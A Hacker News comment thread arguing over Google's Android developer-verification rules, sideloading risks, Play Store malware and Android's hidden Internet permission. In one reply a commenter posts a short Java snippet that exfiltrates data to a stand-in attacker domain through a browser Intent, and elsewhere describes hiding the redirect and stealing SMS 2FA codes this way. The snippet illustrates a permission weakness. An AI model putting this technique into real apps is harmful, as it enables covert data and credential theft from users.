← Back to context

Comment by 87636899376

20 days ago

Official announcement: https://android-developers.googleblog.com/2025/08/elevating-...

More info:

https://developer.android.com/developer-verification

https://support.google.com/googleplay/android-developer/answ...

Personally...we all know the Play Store is chock full of malicious garbage, so the verification requirements there don't do jack to protect users. The way I see it, this is nothing but a power grab, a way for Google to kill apps like Revanced for good. They'll just find some bullshit reason to suspend your developer account if you do something they don't like.

Every time I hear mentions of "safety" from the folks at Google, I'm reminded that there's a hidden Internet permission on Android that can neuter 95% of malicious apps. But it's hidden, apparently because keeping users from using it to block ads on apps is of greater concern to Google than keeping people safe.

> we will be confirming who the developer is, not reviewing the content of their app or where it came from

This is such an odd statement. I mean, surely they have to be willing to review the contents of apps at some point (if only to suspend the accounts of developers who are actually producing malware), or else this whole affair does nothing but introduce friction.

TFA had me believing that bypassing the restriction might've been possible by disabling Play Protect, but that doesn't seem to be the case since there aren't any mentions of it in the official info we've been given.

On the flip side, that's one less platform I care about supporting with my projects. We're down to just Linux and Windows if you're not willing to sell your soul (no, I will not be making a Google account) just for the right to develop for a certain platform.

79 comments

87636899376

Reply
EasyMark  20 days ago

It's never about security (at least not user's security). It's like you pointed out only about power and locking in customers. They don't care if your phone gets hacked or you bank account drained. They care about the bottom line. Android is fine. Google should have 2 layers if they're worried playstore 1 has only well vetted authors and apps. playstore 2 can be the free for all (mostly) of the current store. These could be two different apps or prominent tags. Choice is good, lock down is bad. Corporate does not like employees or customers to have freedom, that's why it's our duty to fire people like the current US regime who always side with corporations over customers.

  • skybrian  20 days ago

    This is a drastic response, but they didn't make up the security threat. Attackers convincing users to side-load malware is a thing.

    https://www.bitdefender.com/en-us/blog/hotforsecurity/hacker...

    • BrenBarn  20 days ago

      The thing is that people sideloading good non-malware apps because they want to is also a thing, and all kinds of icky apps that abuse permissions but are still verified and installed through the Play Store are also a thing. This doesn't really change what is a thing. It just moves more stuff under Google's control.

    • kristopolous  20 days ago

      security is the "Save the Children" of technology. It's not that there isn't a theoretical thing there, it's that in the real material sense, the actual actions taken are power grabs for control and suppression.

    • eadmund  20 days ago

      > Attackers convincing users to side-load malware is a thing.

      Sure. It’s also not Google’s problem.

      It’s not Victorinox’s problem of someone uses a Swiss Army knife to cut someone else. It’s not Toyota’s problem if someone deliberately runs over a pedestrian.

      6 replies →

  • munchlax  20 days ago

    It's the security of having happier shareholders, making more money.

    That's still security, albeit an entirely different threat model.

UncleMeat  20 days ago

> Every time I hear mentions of "safety" from the folks at Google, I'm reminded that there's a hidden Internet permission on Android that can neuter 95% of malicious apps. But it's hidden, apparently because keeping users from using it to block ads on apps is of greater concern to Google than keeping people safe.

You've never needed the internet permission to exfiltrate data. Just send an intent to the browser app to load a page owned by the attacker with the data to be exfilled in the query parameters.

  • gumby271  20 days ago

    Wouldn't that launch the browser app and bring it to the foreground? I wouldn't compare that to having full network access.

    • UncleMeat  20 days ago

      It'd launch the browser app. You can have your evil page redirect to a benign page so it just looks like Chrome randomly opened or whatever. It is not as powerful as full network access as you can only send so much information in query parameters, but if you are doing some phishing or stealing sms 2fa codes or whatever then it is plenty to send back whatever payload you wanted to.

      And of course basically every app requires internet permissions for ordinary behavior. The world where an explicit internet permission would somehow get somebody to look askance at some malware that they were about to download is just not believable.

zozbot234  20 days ago

> had me believing that bypassing the restriction might've been possible by disabling Play Protect, but that doesn't seem to be the case since there aren't any mentions of it in the official info we've been given.

I don't think we can know for sure before the change is actually in place. Going through Play Protect would certainly be the easiest way of implementing this - it would be a simple change from "Play Protect rejects known malware" to "Play Protect rejects any app that isn't properly notarized". This would narrowly address the issue where the existing malware checks are made ineffective by pushing some new variant of the malicious app with a different package id.

It's a big change for the ecosystem nonetheless because it will require all existing developers to register for verification if they want to publish a "legit" app that won't be rejected by any common Android device - and the phrasing of the official announcements accurately reflects this. But this says nothing much as of yet about whether power users will be allowed to proactively disable these checks (just like they can turn off Play Protect today, even though very few people do so in practice).

black3r  20 days ago

> This is such an odd statement. I mean, surely they have to be willing to review the contents of apps at some point (if only to suspend the accounts of developers who are actually producing malware), or else this whole affair does nothing but introduce friction.

Requiring company verification helps against some app pretending to be made by a legitimate institution, e.g. your bank.

Requiring public key registration for package name protects against package modification with malware. Typical issue - I want to download an app that's not on available "in my country" - because I'm on a holiday and want to try some local app, but my "play store country" is tied to my credit card and the developer only made it available in his own country thinking it would be useless for foreigners. I usually try to download it from APKMirror. APKMirror tries to do signature verification. But I may not find it on APKMirror but only on some sketchy site. The sketchy site may not do any signature verification so I can't be sure that I downloaded an original unmodified APK instead of the original APK injected with some malware.

Both of these can be done without actually scanning the package contents. They are essentially just equivalents of EV SSL certificates and DANE/TLSA from TLS world.

  • realusername  20 days ago

    > Typical issue - I want to download an app that's not on available "in my country" - because I'm on a holiday and want to try some local app,

    The solution here is just to get rid of artificial country limitations which make some users download APKs. None of those make sense in the online world anyways.

A4ET8a8uTh0_v2  20 days ago

<< we will be confirming who the developer is, not reviewing the content of their app or where it came from

To be honest, it almost makes me wonder if the issue here is not related to security at all. I am not being sarcastic. What I mean is, maybe the issue revolves around some of the issue MS had with github ( sanctions and KYC checks ).

ycombinatrix  20 days ago

Play Protect is just spyware to monitor app usage & exploitation. It doesn't prevent or protect anything.

realusername  20 days ago

> Every time I hear mentions of "safety" from the folks at Google, I'm reminded that there's a hidden Internet permission on Android that can neuter 95% of malicious apps

Of that they still refuse to sandbox the play store.

It's easy to see that there's a pattern on what they are copying from GrapheneOS.

  • preisschild  20 days ago

    > Of that they still refuse to sandbox the play store.

    It's absolutely essential that Google Play Services have "root" permissions and circumvent the permissions system normal apps have. How else would Google have access to all of your data? :)

baby_souffle  20 days ago

Can you elaborate a little bit about this hidden internet access control setting?

beefnugs  19 days ago

The future for security conscious will be something like grapheneOS for phones, but a step further where the device can only securely connect to your home computer and access regular software there. If you must, run segregated, whitelist only networking, virtual machine apps

nolist_policy  20 days ago

Doesn't Windows have the same thing aka Code Signing?

https://www.electronforge.io/guides/code-signing/code-signin...

  • tsimionescu  20 days ago

    You can install unsigned apps on Windows just fine, maybe with one extra nag screen. Plenty of large open source projects don't sign their installers - VLC being one big example that many normal people use.

    • Voultapher  19 days ago

      IIRC Windows is testing to turn that nag screen into a "no you don't". Which is such BS given all the evidence we have that malware vendors and bad actors have and continue to get their malware signed by MS because they simply can't reliably detect it.

      1 reply →

kllrnohj  20 days ago

> But it's hidden, apparently because keeping users from using it to block ads on apps is of greater concern to Google than keeping people safe.

The internet permission has nothing to do with ads? It's a hidden permission because:

1) Internet connection is so ubiquitous as to just be noise if displayed

2) It's not robust, apps without Internet permission can still exfiltrate data relatively easily by bouncing off of other apps using Intents and similar

  • tgsovlerkhgsel  20 days ago

    It absolutely has to do with ads. While there are various ways to exfiltrate small amounts of data, the non-collaborative ones are rarely silent and most importantly, they won't let the app get responses (e.g. ads) back.

    The main thing this permission would be used for would be blocking ads. Also distinguishing shitty apps that are full of ads from those that aren't. If there is a calculator that needs Internet and one that doesn't, which one are you going to use?

    • kllrnohj  20 days ago

      > The main thing this permission would be used for would be blocking ads.

      This permission has existed for longer than runtime permissions. You have never been able to revoke it, it was just something you agreed to when you installed the app or you didn't install the app.

      It was "removed" in that era because if every app requests the same permission, then nobody cares about it anymore. When every app asks for the same thing, users stop paying attention to it. So no, it had fuck all to do with ads because that was never a thing in the first place. And ad blocking doesn't require this permission, either.

      > Also distinguishing shitty apps that are full of ads from those that aren't. If there is a calculator that needs Internet and one that doesn't, which one are you going to use?

      You can still use it for this. Apps are required to declare the permission still, it's listed on the Play Store under the "permissions" section. Similarly the OS reports the same thing. Presumably F-droid or whatever else also has a list of permissions before you install, and it'll be listed there.

      Although Google's own Calculator app requires Internet permission. Take that for what's it worth.

  • 87636899376  20 days ago

    > 1) Internet connection is so ubiquitous as to just be noise if displayed

    That doesn't make it any less useful.

    > 2) It's not robust, apps without Internet permission can still exfiltrate data relatively easily by bouncing off of other apps using Intents and similar

    I've heard claims that the Internet permission is flawed, yes, but I've never managed to find even a single PoC bypassing it. But even if it is flawed, don't you think Google would be a bit more incentivized to make the Internet permission work as expected if people could disable it?

    • UncleMeat  20 days ago

      > I've heard claims that the Internet permission is flawed, yes, but I've never managed to find even a single PoC bypassing it.

         Uri uri = Uri.parse("https://evildomain.com/upload?data=DATA_GOES_HERE);
   Intent i = new Intent(Intent.ACTION_VIEW, uri);
   startActivity(i);

      Happily uses the browser app to do the data send for you. Requiring apps to have all the permissions of the recipient of an Intent before being allowed to send it would be a catastrophic change to the ecosystem.

      10 replies →

  • zrobotics  20 days ago

    I mean, I just did a quick look over the installed apps on this phone and ~1/4 of them would work perfectly well without an internet connection, things like a level or GPS speedometer that use the phone sensor or apps for Bluetooth control of devices [like 0] . Why would something like a bubble level app need internet access for anything besides telemetry or ads? I realize I have way more of these types of apps than the average user, but apps like this aren't a super-niche thing that would be on 0.1% of devices.

    I just tend to give Google little benefit of the doubt here, considering where their revenue comes from. Same as when they introduced manifest v3, ostensibly for security but just conveniently happening to neuter adblocking. Disabling access to the internet permission for apps aligns with their profit motive.

    • kllrnohj  20 days ago

      There's plenty of actually problematic stuff Google does (like this change in the article), there's no need to make up whack ass conspiracy theories, too.

      8 replies →

fiverz  19 days ago

What is the hidden internet permission called? Is there any way to enable or see it?

  • aucisson_masque  19 days ago

    No you can’t enable it, nowadays developer just declare if they want internet permission. Before, user could say « no, I don’t want you to have internet access ».

    It’s something possible only on grapheneos as far as I know.

carstenhag  19 days ago

"we all know... Play Store... full of malicious garbage" - please point out how that statement is true, given we all know this apparently.

Yes, there are apps out there that try to trick the system and when you use them, instead of looking innocent, it's actually a casino app or something. But Google usually finds those. Are there any apps impersonating a bank? Because that is what regular people care about & think of when someone says "malicious".

They don't care if an app tracks what other apps are installed, what the user taps on, etc. Arguably they should care, but they don't lose money from it.

jeroenhd  20 days ago

There's a reason Google is targeting a few specific countries with this first. Malware from APKs downloaded from the internet is more prominent in some countries than in others. The governments themselves are asking for this because educating the public has turned out to be an impossible task for them.

Still an awful solution that will get bypassed easily, of course. But there's more to this than "Google decided to be a bunch of dicks today".

  • 5d41402abc4b  20 days ago

    The malware makers will use fake or stolen IDs.

    • jeroenhd  19 days ago

      I'm not saying this is a good idea, am I?

      A lot of people are pretending there is no malware problem and that Google should just do nothing and move on. That's not helpful.

      This bullshit needs to be aborted as soon as possible, but a solution for mobile malware is desperately needed. The crutch used on desktop, invasive antivirus, doesn't work on Android unless it comes from the OS manufacturer, so we need a new solution.